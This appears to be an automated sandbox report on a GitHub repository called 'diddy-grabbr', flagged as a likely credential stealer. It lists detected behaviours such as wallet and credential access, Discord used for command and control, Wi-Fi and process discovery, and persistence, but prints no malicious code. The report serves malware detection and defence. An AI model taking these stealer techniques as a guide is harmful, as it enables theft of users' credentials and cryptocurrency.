Malware Analysis Report

2024-12-07 19:53

Sample ID 241114-djczbatenp
Target https://github.com/BANEX12/diddy-grabbr
Tags
credential_access discovery execution persistence privilege_escalation spyware stealer upx
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

Threat Level: Likely malicious

The file https://github.com/BANEX12/diddy-grabbr was found to be: Likely malicious.

Malicious Activity Summary

credential_access discovery execution persistence privilege_escalation spyware stealer upx

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Unsecured Credentials: Credentials In Files

Executes dropped EXE

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Enumerates processes with tasklist

Event Triggered Execution: Netsh Helper DLL

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Detects videocard installed

Kills process with taskkill

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 03:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 03:01

Reported

2024-11-14 03:02

Platform

win10v2004-20241007-en

Max time kernel

33s

Max time network

38s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/BANEX12/diddy-grabbr

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI56722\rar.exe N/A

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4928 wrote to memory of 4912 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 4912 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 808 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 2040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 2040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/BANEX12/diddy-grabbr

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

